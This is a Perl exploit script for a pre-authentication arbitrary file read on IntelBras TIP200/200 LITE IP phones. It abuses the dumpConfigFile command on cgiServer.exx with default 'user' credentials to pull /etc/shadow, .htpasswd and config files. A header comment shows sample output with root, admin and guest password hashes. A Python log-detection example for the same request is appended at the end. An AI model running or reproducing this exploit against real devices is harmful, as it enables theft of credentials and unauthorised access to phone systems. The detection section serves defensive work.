#!/usr/bin/perl -w
#
#IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read
#
#Todor Donev 2019 (c) <todor.donev at gmail.com>
#
#
#Disclaimer:
#This or previous programs are for Educational purpose ONLY. Do not use it without permission.
#The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
#caused by direct or indirect use of the information or functionality provided by these programs.
#The author or any Internet provider bears NO responsibility for content or misuse of these programs
#or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
#system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
#responsibility.
#
#Use them at your own risk!
#
#[test@localhost intelbras]$ perl intelbras_telefone_ip_tip_200_200_lite.pl
#
## IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read
## ========================================================================================================
## Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
## ========================================================================================================
## >Authorization => Basic dXNlcjp1c2Vy
## >User-Agent => Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)
## >Content-Type => application/x-www-form-urlencoded
## <Accept-Ranges => bytes
## <Server => SIPPhone
## <Content-Type => text/html;charset=UTF-8
## <Expires => -1
## <Client-Date => Sun, 01 Sep 2019 13:37:00 GMT
## <Client-Peer => 192.168.1.1
## <Client-Response-Num => 1
## ========================================================================================================
#root:$1$IJZx7biF$BgyHlA/AgR27VSEBALpqn1:11876:0:99999:7:::
#admin:$1$Bwt9zCNI$7rGLYt.wk.axE.6FUNFZe.:11876:0:99999:7:::
#guest:$1$A3lIJ0aO$Is8Ym.J/mpNejleongGft.:11876:0:99999:7:::
#
## ========================================================================================================
#[test@localhost intelbras]$
#
#Simple Mode:
#perl intelbras_telefone_ip_tip_200_200_lite.pl | grep -v "^#"
#
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;

my $host = shift || '';
my $file = shift || '/etc/shadow';
my $user = shift || 'user';
my $pass = shift || 'user';

print "
# IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 \'dumpConfigFile\' Pre-Auth Remote Arbitrary File Read
# ========================================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
";

if ($host !~ m/^http/){
    print "# e.g. perl $0 https://target:port/ /etc/shadow user user
# e.g. perl $0 https://target:port/ /phone/factory/user.ini user user
# e.g. perl $0 https://target:port/ /phone/config/WebItemsLevel.cfg user user
# e.g. perl $0 https://target:port/ /phone/config/.htpasswd user user
";
    exit;
}

my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(
    protocols_allowed => ['http', 'https'],
    ssl_opts => { verify_hostname => 0 }
);
$browser->timeout(10);
$browser->agent($user_agent);

my $payload = $host."/cgi-bin/cgiServer.exx?command=dumpConfigFile(\"$file\")";
my $request = HTTP::Request->new (GET => $payload,[ Content_Type => "application/x-www-form-urlencoded"], " ");
$request->authorization_basic($user, $pass);
print "# ========================================================================================================\n";
my $response = $browser->request($request);
say "# >$_ => ", $request->header($_) for $request->header_field_names;
say "# <$_ => ", $response->header($_) for $response->header_field_names;
print "# 401 Unauthorized! Wrong Username or Password!\n" and exit if ($response->code eq '401');
print "# ========================================================================================================\n";

if ($response->content =~ m/$file/g){
    my $content = $response->content;
    $content =~ s/$file//g;
    $content =~ s/^\n+//;
    print $content;
    print "\n# ========================================================================================================\n";
    exit;
} else {
    print "# Exploit failed or full path is wrong..\n";
    exit;
}
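
For detection, the request built above has a stable shape: a GET to /cgi-bin/cgiServer.exx whose query string calls dumpConfigFile with a file path. The following log check is an added example, not part of the original script; it assumes a reverse proxy or network sensor in front of the phone that writes Combined Log Format, and the sample lines and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample lines in Combined Log Format (addresses from RFC 5737).
SAMPLE_LOG = """\
192.0.2.10 - user [01/Sep/2019:13:37:00 +0000] "GET /cgi-bin/cgiServer.exx?command=dumpConfigFile(%22/etc/shadow%22) HTTP/1.1" 200 231 "-" "Mozilla/4.0"
192.0.2.10 - user [01/Sep/2019:13:37:05 +0000] "GET /cgi-bin/cgiServer.exx?command=dumpConfigFile(%2522/phone/config/.htpasswd%2522) HTTP/1.1" 200 88 "-" "Mozilla/4.0"
198.51.100.7 - - [01/Sep/2019:13:40:11 +0000] "GET /index.htm HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Sep/2019:13:41:02 +0000] "GET /cgi-bin/cgiServer.exx?page=status HTTP/1.1" 401 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
DUMP_RE = re.compile(r'dumpConfigFile\(\s*["\']?(?P<path>[^"\')]*)', re.IGNORECASE)


def fully_unquote(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded requests are still matched."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_dump_requests(log_text):
    """Return one dict per request that calls dumpConfigFile on cgiServer.exx."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if not parts.path.lower().endswith("/cgi-bin/cgiserver.exx"):
            continue
        call = DUMP_RE.search(fully_unquote(parts.query))
        if call:
            hits.append({"src": m["src"], "user": m["user"], "time": m["ts"],
                         "status": int(m["status"]), "file": call["path"]})
    return hits


if __name__ == "__main__":
    for hit in find_dump_requests(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 means file contents were returned to the client, so the accounts in any exposed credential file should be treated as compromised.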